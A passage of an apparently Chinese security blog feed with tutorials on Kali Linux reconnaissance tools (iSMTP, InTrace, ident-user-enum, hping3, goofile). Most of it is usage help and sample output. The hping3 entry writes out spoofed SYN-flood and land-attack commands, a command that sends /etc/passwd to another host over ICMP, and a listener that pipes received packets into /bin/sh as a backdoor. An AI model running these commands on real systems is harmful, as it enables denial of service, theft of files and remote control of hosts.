class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">root@kali:~# ismtp -f smtp-ips.txt -e /usr/share/wordlists/metasploit/unix_users.txt</div><div class="line"></div><div class="line"> ---------------------------------------------------------------------</div><div class="line">  iSMTP v1.6 - SMTP Server Tester, Alton Johnson (alton.jx@gmail.com)</div><div class="line"> ---------------------------------------------------------------------</div><div class="line"></div><div class="line"> Testing SMTP server [user enumeration]: 192.168.1.25:25</div><div class="line"> Emails provided for testing: 109</div><div class="line"></div><div class="line"> Performing SMTP VRFY test...</div><div class="line"></div><div class="line"> [-] 4Dgifts ------------- [ invalid ]</div><div class="line"> [-] EZsetup ------------- [ invalid ]</div><div class="line"> [+] ROOT ---------------- [ success ]</div><div class="line"> [+] adm ----------------- [ success ]</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
测试SMTP用户枚举（RCPT TO和VRFY），内部欺骗和转发。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="sniffing" scheme="https://hackfun.org/tags/sniffing/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="spoofing" scheme="https://hackfun.org/tags/spoofing/"/>
    
      <category term="smtp" scheme="https://hackfun.org/tags/smtp/"/>
    
      <category term="ismtp" scheme="https://hackfun.org/tags/ismtp/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之intrace</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bintrace/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之intrace/</id>
    <published>2017-04-23T00:54:45.000Z</published>
    <updated>2017-10-02T19:22:31.946Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>InTrace是一款类似于Traceroute的被动路由跟踪工具。但它不同的是，他不主动发送数据包，而是通过监听当前主机和目标主机的数据包，进行分析，从而获取路由信息。这样既可以进行网络侦查，又可以绕过防火墙的限制，避免被防火墙发现。工具使用非常简单，只要开启监听，然后等待获取和目标主机的数据包，然后就可以获取路由跟踪信息了。使用的时候需要指定端口。该端口号必须在TCP连接中使用到。否则，就无法捕获对应的数据包。</p><a id="more"></a><p><a href="http://code.google.com/p/intrace/" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/intrace.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Robert Swiecki</li><li>证书：GPLv3</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">root@kali:~# intrace</div><div class="line">InTrace, version 1.5 (C)2007-2011 Robert Swiecki &lt;robert@swiecki.net&gt;</div><div class="line">2014/05/20 09:59:29.627368 &lt;INFO&gt; 用法: intrace &lt;-h 主机&gt; [-p &lt;端口&gt;] [-d &lt;调试级别&gt;] [-s &lt;载荷大小&gt;] [-6]</div></pre></td></tr></table></figure><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>使用数据包大小为4字节（-s 4），指定端口80（-p 80）向目标主机（-h www.example.com）进行路由跟踪：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">root@kali:~# intrace -h www.example.com -p 80 -s 4</div><div class="line">InTrace 1.5 -- R: 93.184.216.119/80 (80) L: 192.168.1.130/51654</div><div class="line">Payload Size: 4 bytes, Seq: 0x0d6dbb02, Ack: 0x8605bff0</div><div class="line">Status: Packets sent #8</div><div class="line"></div><div class="line">  #  [src addr]         [icmp src addr]    [pkt type]</div><div class="line"> 1.  [192.168.1.1    ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 2.  [192.168.0.1    ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 3.  [  ---          ]  [  ---          ]  [NO REPLY]</div><div class="line"> 4.  [64.59.184.185  ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 5.  [66.163.70.25   ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 6.  [66.163.64.150  ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 7.  [66.163.75.117  ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div><div class="line"> 8.  [206.223.119.59 ]  [93.184.216.119 ]  [ICMP_TIMXCEED]</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
InTrace是一款类似于Traceroute的被动路由跟踪工具。但它不同的是，他不主动发送数据包，而是通过监听当前主机和目标主机的数据包，进行分析，从而获取路由信息。这样既可以进行网络侦查，又可以绕过防火墙的限制，避免被防火墙发现。工具使用非常简单，只要开启监听，然后等待获取和目标主机的数据包，然后就可以获取路由跟踪信息了。使用的时候需要指定端口。该端口号必须在TCP连接中使用到。否则，就无法捕获对应的数据包。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="evasion" scheme="https://hackfun.org/tags/evasion/"/>
    
      <category term="intrace" scheme="https://hackfun.org/tags/intrace/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之ident-user-enum</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bident-user-enum/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之ident-user-enum/</id>
    <published>2017-04-23T00:22:00.000Z</published>
    <updated>2017-10-02T19:22:31.938Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>视频介绍：<a href="https://asciinema.org/a/107704" target="_blank" rel="external">https://asciinema.org/a/107704</a><br>ident-user-enum是一个简单的PERL脚本，用于查询识别服务（113/TCP），以确定在目标系统的每个TCP端口上侦听进程的所有者。 这可以帮助在一个最好的时间内确定目标服务的优先级（您可能希望攻击以root用户身份运行的服务）。或者，所收集的用户名的列表可用于对其他网络服务的密码猜测攻击。</p><a id="more"></a><p>工具来源：<a href="http://pentestmonkey.net/tools/user-enumeration/ident-user-enum" target="_blank" rel="external">http://pentestmonkey.net/tools/user-enumeration/ident-user-enum</a><br><a href="http://pentestmonkey.net/tools/user-enumeration/ident-user-enum" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/ident-user-enum.git" target="_blank" rel="external">仓库</a></p><ul><li>作者：pentestmonkey</li><li>证书：MIT</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">root@kali:~# ident-user-enum</div><div class="line">ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )</div><div class="line"></div><div class="line">用法: ident-user-enum.pl ip地址 端口</div><div class="line"></div><div class="line">查询识别（113 / TCP）以确定操作系统级用户运行该进程在给定的TCP端口上侦听服务。可以提供多个端口。</div></pre></td></tr></table></figure><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>扫描远程主机（192.168.1.13），确定哪个用户在指定端口上运行服务（22 139 445）。<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">root@kali:~# ident-user-enum 192.168.1.13 22 139 445</div><div class="line">ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )</div><div class="line"></div><div class="line">192.168.1.13:22     root</div><div class="line">192.168.1.13:139    root</div><div class="line">192.168.1.13:445    root</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
视频介绍：https://asciinema.org/a/107704 [https://asciinema.org/a/107704]
ident-user-enum是一个简单的PERL脚本，用于查询识别服务（113/TCP），以确定在目标系统的每个TCP端口上侦听进程的所有者。
这可以帮助在一个最好的时间内确定目标服务的优先级（您可能希望攻击以root用户身份运行的服务）。或者，所收集的用户名的列表可用于对其他网络服务的密码猜测攻击。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="enumeration" scheme="https://hackfun.org/tags/enumeration/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="portscanning" scheme="https://hackfun.org/tags/portscanning/"/>
    
      <category term="infogathering" scheme="https://hackfun.org/tags/infogathering/"/>
    
      <category term="ident-user-enum" scheme="https://hackfun.org/tags/ident-user-enum/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之hping3</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bhping3/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之hping3/</id>
    <published>2017-04-22T22:52:00.000Z</published>
    <updated>2017-10-02T19:22:31.935Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-hping3介绍"><a href="#0x00-hping3介绍" class="headerlink" title="0x00 hping3介绍"></a>0x00 hping3介绍</h2><p>hping是面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。作者是Salvatore Sanfilippo，界面灵感来自ping（8）unix命令，目前最新版是hping3，它支持TCP，UDP，ICMP和RAW-IP协议，具有跟踪路由模式，能够在覆盖的信道之间发送文件以及许多其他功能，支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。</p><a id="more"></a><p>虽然hping以前主要用作安全工具，但它可以在许多方面被不太关心安全性的人员用于测试网络和主机，您可以使用hping的一小部分内容：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">- 防火墙测试</div><div class="line">- 高级端口扫描</div><div class="line">- 网络测试，使用不同的协议，TOS，分片</div><div class="line">- 手动路径MTU发现</div><div class="line">- 在所有支持的协议下，高级traceroute</div><div class="line">- 远程操作系统指纹</div><div class="line">- 远程正常运行时间猜测</div><div class="line">- TCP/IP协议栈审计</div><div class="line">- hping也可以用于学习TCP/IP的学生</div></pre></td></tr></table></figure><p></p><!--more--><p>工具来源：<a href="http://www.hping.org/" target="_blank" rel="external">http://www.hping.org/</a><br><a href="http://www.hping.org/" target="_blank" rel="external">hping3主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/hping3.git;a=summary" target="_blank" rel="external">Kali hping3仓库</a></p><ul><li>作者：Salvatore Sanfilippo</li><li>证书：GPLv2</li></ul><h2 id="0x01-hping3功能"><a href="#0x01-hping3功能" class="headerlink" title="0x01 hping3功能"></a>0x01 hping3功能</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div></pre></td><td class="code"><pre><div class="line">root@kali:~# hping3 -h</div><div class="line">用法: hping3 主机 [options]</div><div class="line">  -h  --help      显示帮助</div><div class="line">  -v  --version   显示版本</div><div class="line">  -c  --count     数据包计数</div><div class="line">  -i  --interval  等待 (uX即X微秒, 例如： -i u1000)</div><div class="line">      --fast      等同 -i u10000 (每秒10个包)</div><div class="line">      --faster    等同 -i u1000 (每秒100个包)</div><div class="line">      --flood     尽最快发送数据包，不显示回复。</div><div class="line">  -n  --numeric   数字输出</div><div class="line">  -q  --quiet     静默模式</div><div class="line">  -I  --interface 接口名 (默认路由接口)</div><div class="line">  -V  --verbose   详细模式</div><div class="line">  -D  --debug     调试信息</div><div class="line">  -z  --bind      绑定ctrl+z到ttl(默认为目的端口)</div><div class="line">  -Z  --unbind    取消绑定ctrl+z键</div><div class="line">      --beep      对于接收到的每个匹配数据包蜂鸣声提示</div><div class="line">模式</div><div class="line">  默认模式     TCP</div><div class="line">  -0  --rawip      原始IP模式</div><div class="line">  -1  --icmp       ICMP模式</div><div class="line">  -2  --udp        UDP模式</div><div class="line">  -8  --scan       SCAN模式</div><div class="line">                   例子: hping --scan 1-30,70-90 -S www.target.host</div><div class="line">  -9  --listen     listen模式</div><div class="line">IP</div><div class="line">  -a  --spoof      伪造源地址</div><div class="line">  --rand-dest      随机目的地址模式。详细使用man命令</div><div class="line">  --rand-source    随机来源地址模式。详细使用man命令</div><div class="line">  -t  --ttl        ttl (默认64)</div><div class="line">  -N  --id         id (默认随机)</div><div class="line">  -W  --winid      使用win* id字节顺序</div><div class="line">  -r  --rel        相对id字段(估计主机流量)</div><div class="line">  -f  --frag       拆分数据包更多的frag</div><div class="line">  -x  --morefrag   设置更多的分段标志</div><div class="line">  -y  --dontfrag   设置不分段标志</div><div class="line">  -g  --fragoff    设置分段偏移</div><div class="line">  -m  --mtu        设置虚拟最大传输单元</div><div class="line">  -o  --tos        服务类型（默认为0x00），尝试--tos帮助</div><div class="line">  -G  --rroute     包含RECORD_ROUTE选项并显示路由缓冲区</div><div class="line">  --lsrr           松散源路由并记录路由</div><div class="line">  --ssrr           严格源路由并记录路由</div><div class="line">  -H  --ipproto    设置IP协议字段，仅在RAW IP模式下使用</div><div class="line">ICMP</div><div class="line">  -C  --icmptype   icmp类型(默认echo请求)</div><div class="line">  -K  --icmpcode   icmp代号(默认0)</div><div class="line">      --force-icmp 发送所有icmp类型(默认仅发送支持的类型)</div><div class="line">      --icmp-gw    设置ICMP重定向网关地址(默认0.0.0.0)</div><div class="line">      --icmp-ts    等同 --icmp --icmptype 13 (ICMP 时间戳)</div><div class="line">      --icmp-addr  等同 --icmp --icmptype 17 (ICMP 地址子网掩码)</div><div class="line">      --icmp-help  显示其他icmp选项帮助</div><div class="line">UDP/TCP</div><div class="line">  -s  --baseport   基源端口(默认随机)</div><div class="line">  -p  --destport   [+][+]&lt;port&gt; 目的端口(默认0) ctrl+z inc/dec</div><div class="line">  -k  --keep       保持源端口</div><div class="line">  -w  --win        windows发送字节(默认64)</div><div class="line">  -O  --tcpoff     设置伪造tcp数据偏移量(取代tcp地址长度除4)</div><div class="line">  -Q  --seqnum     仅显示tcp序列号</div><div class="line">  -b  --badcksum   (尝试)发送具有错误IP校验和数据包                    </div><div class="line">                   许多系统将修复发送数据包的IP校验和                    </div><div class="line">                   所以你会得到错误UDP/TCP校验和。</div><div class="line">  -M  --setseq     设置TCP序列号</div><div class="line">  -L  --setack     设置TCP确认</div><div class="line">  -F  --fin        设置FIN标志</div><div class="line">  -S  --syn        设置SYN标志</div><div class="line">  -R  --rst        设置RST标志</div><div class="line">  -P  --push       设置PUSH标志</div><div class="line">  -A  --ack        设置ACK标志</div><div class="line">  -U  --urg        设置URG标志</div><div class="line">  -X  --xmas       设置X未使用的标志(0x40)</div><div class="line">  -Y  --ymas       设置Y未使用的标志(0x80)</div><div class="line">  --tcpexitcode    使用last tcp-&gt; th_flags作为退出码</div><div class="line">  --tcp-mss        启用具有给定值的TCP MSS选项</div><div class="line">  --tcp-timestamp  启用TCP时间戳选项来猜测HZ/uptime</div><div class="line">通用</div><div class="line">  -d  --data       数据大小(默认0)</div><div class="line">  -E  --file       文件数据</div><div class="line">  -e  --sign       添加“签名”</div><div class="line">  -j  --dump       转储为十六进制数据包</div><div class="line">  -J  --print      转储为可打印字符</div><div class="line">  -B  --safe       启用“安全”协议</div><div class="line">  -u  --end        告诉你什么时候--file达到EOF并防止倒回</div><div class="line">  -T  --traceroute traceroute模式(等同使用 --bind 且--ttl 1)</div><div class="line">  --tr-stop        在traceroute模式下收到第一个不是ICMP时退出</div><div class="line">  --tr-keep-ttl    保持源TTL固定，仅用于监视一跳</div><div class="line">  --tr-no-rtt      不要在跟踪路由模式下计算/显示RTT信息 ARS包描述（新增功能，不稳定）</div><div class="line">  --apd-send       发送APD描述数据包(参见docs / APD.txt)</div></pre></td></tr></table></figure><h2 id="0x02-hping3用法示例"><a href="#0x02-hping3用法示例" class="headerlink" title="0x02 hping3用法示例"></a>0x02 hping3用法示例</h2><p>对于目标（www.example.com），使用跟踪路由模式（-traceroute），在ICMP模式（-1）中详细显示verbose（-V）：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">root@kali:~# hping3 --traceroute -V -1 www.example.com</div><div class="line">using eth0, addr: 192.168.1.15, MTU: 1500</div><div class="line">HPING www.example.com (eth0 93.184.216.119): icmp mode set, 28 headers + 0 data bytes</div><div class="line">hop=1 TTL 0 during transit from ip=192.168.1.1 name=UNKNOWN</div><div class="line">hop=1 hoprtt=0.3 ms</div><div class="line">hop=2 TTL 0 during transit from ip=192.168.0.1 name=UNKNOWN</div><div class="line">hop=2 hoprtt=3.3 ms</div></pre></td></tr></table></figure><p></p><h2 id="0x03-hping3典型功能"><a href="#0x03-hping3典型功能" class="headerlink" title="0x03 hping3典型功能"></a>0x03 hping3典型功能</h2><p><strong>防火墙测试</strong><br>使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：<a href="http://0daysecurity.com/articles/hping3_examples.html" target="_blank" rel="external">http://0daysecurity.com/articles/hping3_examples.html</a><br>测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。<br>例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。</p><pre><code>hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10 </code></pre><p>端口扫描<br>Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。<br>以下示例可用于探测目标机的80端口是否开放：</p><pre><code>hping3 -I eth0 -S 192.168.10.1 -p 80 </code></pre><p>其中-I eth0指定使用eth0端口，-S指定TCP包的标志位SYN，-p 80指定探测的目的端口。<br>hping3支持非常丰富的端口探测方式，nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，<br>所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。<br>当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。</p><p><strong>Idle扫描</strong><br>Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，<br>目前Idle扫描在Nmap中也有实现。 该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），<br>攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），<br>此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，<br>获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。</p><p><strong>拒绝服务攻击</strong></p><p>使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。</p><pre><code>hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000 </code></pre><p>其他攻击如smurf、teardrop、land attack等也很容易构建出来。</p><p><strong>文件传输</strong><br>Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。<br>实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。<br>在接收端开启服务：</p><pre><code>hping3 192.168.1.159--listen signature --safe --icmp </code></pre><p>监听ICMP包中的签名，根据签名解析出文件内容。<br>在发送端使用签名打包的ICMP包发送文件：</p><pre><code>hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd </code></pre><p>将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。</p><p><strong>木马功能</strong><br>如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。<br>示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。<br>在木马启动端：</p><pre><code>hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh </code></pre><p>在远程控制端：</p><pre><code>echo ls &gt;test.cmd hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd </code></pre><p>将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。<br>当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。</p>]]></content>
    
    <summary type="html">
    
      #0X00-HPING3介绍0X00 HPING3介绍
hping是面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。作者是Salvatore
Sanfilippo，界面灵感来自ping（8）unix命令，目前最新版是hping3，它支持TCP，UDP，ICMP和RAW-IP协议，具有跟踪路由模式，能够在覆盖的信道之间发送文件以及许多其他功能，支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="spoofing" scheme="https://hackfun.org/tags/spoofing/"/>
    
      <category term="hping3" scheme="https://hackfun.org/tags/hping3/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之goofile</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bgoofile/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之goofile/</id>
    <published>2017-04-22T22:24:00.000Z</published>
    <updated>2017-10-02T19:22:31.931Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-goofile介绍"><a href="#0x00-goofile介绍" class="headerlink" title="0x00 goofile介绍"></a>0x00 goofile介绍</h2><p>视频介绍：<a href="https://asciinema.org/a/31264" target="_blank" rel="external">https://asciinema.org/a/31264</a><br>使用此工具可以在给定的域中搜索特定的文件类型。</p><a id="more"></a><p><a href="http://code.google.com/p/goofile/" target="_blank" rel="external">goofile主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/goofile.git;a=summary" target="_blank" rel="external">Kali goofile仓库</a></p><ul><li>作者：Thomas Richards</li><li>证书：MIT</li></ul><h2 id="0x01-goofile功能"><a href="#0x01-goofile功能" class="headerlink" title="0x01 goofile功能"></a>0x01 goofile功能</h2><p>golismero - Web应用程序映射器<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">root@kali:~# goofile</div><div class="line"></div><div class="line">-------------------------------------</div><div class="line">|Goofile v1.5                       |</div><div class="line">|Coded by Thomas (G13) Richards     |</div><div class="line">|www.g13net.com                     |</div><div class="line">|code.google.com/p/goofile          |</div><div class="line">-------------------------------------</div><div class="line"></div><div class="line"></div><div class="line">Goofile 1.5</div><div class="line"></div><div class="line">用法: goofile [选项]</div><div class="line"></div><div class="line">       -d: 指定域名</div><div class="line"></div><div class="line">       -f: 指定文件类型 (扩展名如：pdf)</div><div class="line"></div><div class="line">示例:./goofile.py -d test.com -f txt</div></pre></td></tr></table></figure><p></p><h2 id="0x02-goofile用法示例"><a href="#0x02-goofile用法示例" class="headerlink" title="0x02 goofile用法示例"></a>0x02 goofile用法示例</h2><p>搜索域名(-d kali.org)中的PDF文件(-f pdf):<br></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">root@kali:~# goofile -d kali.org -f pdf</div><div class="line"></div><div class="line">-------------------------------------</div><div class="line">|Goofile v1.5                       |</div><div class="line">|Coded by Thomas (G13) Richards     |</div><div class="line">|www.g13net.com                     |</div><div class="line">|code.google.com/p/goofile          |</div><div class="line">-------------------------------------</div><div class="line"></div><div class="line"></div><div class="line">Searching in kali.org for pdf</div><div class="line">========================================</div><div class="line"></div><div class="line">Files found:</div><div class="line">====================</div><div class="line"></div><div class="line">docs.kali.org/pdf/kali-book-fr.pdf</div><div class="line">docs.kali.org/pdf/kali-book-es.pdf</div><div class="line">docs.kali.org/pdf/kali-book-id.pdf</div><div class="line">docs.kali.org/pdf/kali-book-de.pdf</div><div class="line">docs.kali.org/pdf/kali-book-it.pdf</div><div class="line">docs.kali.org/pdf/kali-book-ar.pdf</div><div class="line">docs.kali.org/pdf/kali-book-ja.pdf</div><div class="line">docs.kali.org/pdf/kali-book-nl.pdf</div><div class="line">docs.kali.org/pdf/kali-book-ru.pdf</div><div class="line">docs.kali.org/pdf/kali-book-en.pdf</div><div class="line">docs.kali.org/pdf/kali-book-pt-br.pdf</div><div class="line">docs.kali.org/pdf/kali-book-zh-hans.pdf</div><div class="line">docs.kali.org/pdf/kali-book-sw.pdf</div><div 